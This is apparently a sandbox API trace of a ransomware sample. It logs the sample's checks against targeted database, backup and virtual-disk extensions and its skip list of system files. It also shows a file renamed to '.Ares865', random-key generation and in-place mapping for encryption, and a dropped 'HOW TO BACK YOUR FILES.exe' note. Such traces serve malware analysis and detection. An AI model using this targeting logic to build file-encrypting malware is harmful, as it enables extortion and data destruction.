lstrlenW (lpString="alf") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0075.660] lstrlenW (lpString="ask") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0075.660] lstrlenW (lpString="btr") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0075.660] lstrlenW (lpString="cat") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0075.661] lstrlenW (lpString="cdb") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0075.661] lstrlenW (lpString="ckp") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0075.661] lstrlenW (lpString="cma") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0075.661] lstrlenW (lpString="cpd") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0075.661] lstrlenW (lpString="dacpac") returned 6 [0075.661] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0075.661] lstrlenW (lpString="dad") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0075.661] lstrlenW (lpString="dadiagrams") returned 10 [0075.661] lstrlenW (lpString="daschema") returned 8 [0075.661] lstrlenW (lpString="db-journal") returned 10 [0075.661] lstrlenW (lpString="db-shm") returned 6 [0075.661] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0075.661] lstrlenW (lpString="db-wal") returned 6 [0075.661] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0075.661] lstrlenW (lpString="dbc") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0075.661] lstrlenW (lpString="dbs") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0075.661] lstrlenW (lpString="dbt") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0075.661] lstrlenW (lpString="dbv") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0075.661] lstrlenW (lpString="dbx") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0075.661] lstrlenW (lpString="dcb") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0075.661] lstrlenW (lpString="dct") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0075.661] lstrlenW (lpString="dcx") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0075.661] lstrlenW (lpString="ddl") returned 3 [0075.661] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0075.661] lstrlenW (lpString="dlis") returned 4 [0075.661] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0075.662] lstrlenW (lpString="dp1") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0075.662] lstrlenW (lpString="dqy") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0075.662] lstrlenW (lpString="dsk") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0075.662] lstrlenW (lpString="dsn") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0075.662] lstrlenW (lpString="dtsx") returned 4 [0075.662] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0075.662] lstrlenW (lpString="dxl") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0075.662] lstrlenW (lpString="eco") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0075.662] lstrlenW (lpString="ecx") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0075.662] lstrlenW (lpString="edb") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0075.662] lstrlenW (lpString="epim") returned 4 [0075.662] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0075.662] lstrlenW (lpString="fcd") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0075.662] lstrlenW (lpString="fdb") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0075.662] lstrlenW (lpString="fic") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0075.662] lstrlenW (lpString="flexolibrary") returned 12 [0075.662] lstrlenW (lpString="fm5") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0075.662] lstrlenW (lpString="fmp") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0075.662] lstrlenW (lpString="fmp12") returned 5 [0075.662] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0075.662] lstrlenW (lpString="fmpsl") returned 5 [0075.662] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0075.662] lstrlenW (lpString="fol") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0075.662] lstrlenW (lpString="fp3") returned 3 [0075.662] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0075.663] lstrlenW (lpString="fp4") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0075.663] lstrlenW (lpString="fp5") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0075.663] lstrlenW (lpString="fp7") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0075.663] lstrlenW (lpString="fpt") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0075.663] lstrlenW (lpString="frm") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0075.663] lstrlenW (lpString="gdb") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0075.663] lstrlenW (lpString="gdb") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0075.663] lstrlenW (lpString="grdb") returned 4 [0075.663] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0075.663] lstrlenW (lpString="gwi") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0075.663] lstrlenW (lpString="hdb") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0075.663] lstrlenW (lpString="his") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0075.663] lstrlenW (lpString="ib") returned 2 [0075.663] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0075.663] lstrlenW (lpString="idb") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0075.663] lstrlenW (lpString="ihx") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0075.663] lstrlenW (lpString="itdb") returned 4 [0075.663] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0075.663] lstrlenW (lpString="itw") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0075.663] lstrlenW (lpString="jet") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0075.663] lstrlenW (lpString="jtx") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0075.663] lstrlenW (lpString="kdb") returned 3 [0075.663] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0075.663] lstrlenW (lpString="kexi") returned 4 [0075.664] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0075.664] lstrlenW (lpString="kexic") returned 5 [0075.664] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0075.664] lstrlenW (lpString="kexis") returned 5 [0075.664] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0075.664] lstrlenW (lpString="lgc") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0075.664] lstrlenW (lpString="lwx") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0075.664] lstrlenW (lpString="maf") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0075.664] lstrlenW (lpString="maq") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0075.664] lstrlenW (lpString="mar") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0075.664] lstrlenW (lpString="marshal") returned 7 [0075.664] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0075.664] lstrlenW (lpString="mas") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0075.664] lstrlenW (lpString="mav") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0075.664] lstrlenW (lpString="maw") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0075.664] lstrlenW (lpString="mdbhtml") returned 7 [0075.664] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0075.664] lstrlenW (lpString="mdn") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0075.664] lstrlenW (lpString="mdt") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0075.664] lstrlenW (lpString="mfd") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0075.664] lstrlenW (lpString="mpd") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0075.664] lstrlenW (lpString="mrg") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0075.664] lstrlenW (lpString="mud") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0075.664] lstrlenW (lpString="mwb") returned 3 [0075.664] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0075.665] lstrlenW (lpString="myd") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0075.665] lstrlenW (lpString="ndf") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0075.665] lstrlenW (lpString="nnt") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0075.665] lstrlenW (lpString="nrmlib") returned 6 [0075.665] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0075.665] lstrlenW (lpString="ns2") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0075.665] lstrlenW (lpString="ns3") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0075.665] lstrlenW (lpString="ns4") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0075.665] lstrlenW (lpString="nsf") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0075.665] lstrlenW (lpString="nv") returned 2 [0075.665] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0075.665] lstrlenW (lpString="nv2") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0075.665] lstrlenW (lpString="nwdb") returned 4 [0075.665] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0075.665] lstrlenW (lpString="nyf") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0075.665] lstrlenW (lpString="odb") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0075.665] lstrlenW (lpString="odb") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0075.665] lstrlenW (lpString="oqy") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0075.665] lstrlenW (lpString="ora") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0075.665] lstrlenW (lpString="orx") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0075.665] lstrlenW (lpString="owc") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0075.665] lstrlenW (lpString="p96") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0075.665] lstrlenW (lpString="p97") returned 3 [0075.665] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0075.666] lstrlenW (lpString="pan") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0075.666] lstrlenW (lpString="pdb") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0075.666] lstrlenW (lpString="pdm") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0075.666] lstrlenW (lpString="pnz") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0075.666] lstrlenW (lpString="qry") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0075.666] lstrlenW (lpString="qvd") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0075.666] lstrlenW (lpString="rbf") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0075.666] lstrlenW (lpString="rctd") returned 4 [0075.666] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0075.666] lstrlenW (lpString="rod") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0075.666] lstrlenW (lpString="rodx") returned 4 [0075.666] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0075.666] lstrlenW (lpString="rpd") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0075.666] lstrlenW (lpString="rsd") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0075.666] lstrlenW (lpString="sas7bdat") returned 8 [0075.666] lstrlenW (lpString="sbf") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0075.666] lstrlenW (lpString="scx") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0075.666] lstrlenW (lpString="sdb") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0075.666] lstrlenW (lpString="sdc") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0075.666] lstrlenW (lpString="sdf") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0075.666] lstrlenW (lpString="sis") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0075.666] lstrlenW (lpString="spq") returned 3 [0075.666] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0075.667] lstrlenW (lpString="te") returned 2 [0075.667] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0075.667] lstrlenW (lpString="teacher") returned 7 [0075.667] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0075.667] lstrlenW (lpString="tmd") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0075.667] lstrlenW (lpString="tps") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0075.667] lstrlenW (lpString="trc") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0075.667] lstrlenW (lpString="trc") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0075.667] lstrlenW (lpString="trm") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0075.667] lstrlenW (lpString="udb") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0075.667] lstrlenW (lpString="udl") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0075.667] lstrlenW (lpString="usr") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0075.667] lstrlenW (lpString="v12") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0075.667] lstrlenW (lpString="vis") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0075.667] lstrlenW (lpString="vpd") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0075.667] lstrlenW (lpString="vvv") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0075.667] lstrlenW (lpString="wdb") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0075.667] lstrlenW (lpString="wmdb") returned 4 [0075.667] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0075.667] lstrlenW (lpString="wrk") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0075.667] lstrlenW (lpString="xdb") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0075.667] lstrlenW (lpString="xld") returned 3 [0075.667] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0075.667] lstrlenW (lpString="xmlff") returned 5 [0075.668] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0075.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865") returned 131 [0075.668] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0075.671] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0075.671] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1034506) returned 1 [0075.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0075.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0075.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0075.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0075.678] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0075.678] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0075.678] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfcc10, lpName=0x0) returned 0x154 [0075.679] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfcc10) returned 0x2e30000 [0076.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0076.201] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0076.201] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0076.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0076.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x3330d0 [0076.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0076.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3330d0 | out: hHeap=0x2b0000) returned 1 [0076.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0076.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0076.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0076.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0076.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0076.202] UnmapViewOfFile (lpBaseAddress=0x2e30000) returned 1 [0076.211] CloseHandle (hObject=0x154) returned 1 [0076.211] CloseHandle (hObject=0x12c) returned 1 [0076.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0076.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0076.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0076.218] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1bf120, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0076.222] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0076.224] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0076.224] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0076.224] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="aoldtz.exe") returned 1 [0076.224] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0076.225] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0076.225] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0076.225] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="bootmgr") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="temp") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="pagefile.sys") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="boot") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ids.txt") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="perflogs") returned 1 [0076.232] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="MSBuild") returned 1 [0076.232] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0076.233] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.235] lstrcpyW (in: lpString1=0x2cce4e6, lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="vc_runtimeMinimum_x64.msi") returned="vc_runtimeMinimum_x64.msi" [0076.235] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0076.235] lstrlenW (lpString="Ares865") returned 7 [0076.237] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0076.237] lstrlenW (lpString=".dll") returned 4 [0076.237] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".dll") returned 1 [0076.237] lstrlenW (lpString=".lnk") returned 4 [0076.238] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".lnk") returned 1 [0076.238] lstrlenW (lpString=".ini") returned 4 [0076.238] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".ini") returned 1 [0076.239] lstrlenW (lpString=".sys") returned 4 [0076.239] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".sys") returned 1 [0076.242] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0076.242] lstrlenW (lpString="bak") returned 3 [0076.248] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0076.248] lstrlenW (lpString="ba_") returned 3 [0076.248] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0076.250] lstrlenW (lpString="dbb") returned 3 [0076.250] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0076.251] lstrlenW (lpString="vmdk") returned 4 [0076.251] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0076.254] lstrlenW (lpString="rar") returned 3 [0076.254] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0076.254] lstrlenW (lpString="zip") returned 3 [0076.255] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0076.263] lstrlenW (lpString="tgz") returned 3 [0076.263] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0076.264] lstrlenW (lpString="vbox") returned 4 [0076.264] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0076.264] lstrlenW (lpString="vdi") returned 3 [0076.267] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0076.267] lstrlenW (lpString="vhd") returned 3 [0076.267] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0076.267] lstrlenW (lpString="vhdx") returned 4 [0076.267] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0076.267] lstrlenW (lpString="avhd") returned 4 [0076.268] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0076.268] lstrlenW (lpString="db") returned 2 [0076.268] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0076.268] lstrlenW (lpString="db2") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0076.268] lstrlenW (lpString="db3") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0076.268] lstrlenW (lpString="dbf") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0076.268] lstrlenW (lpString="mdf") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0076.268] lstrlenW (lpString="mdb") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0076.268] lstrlenW (lpString="sql") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0076.268] lstrlenW (lpString="sqlite") returned 6 [0076.268] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0076.268] lstrlenW (lpString="sqlite3") returned 7 [0076.268] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 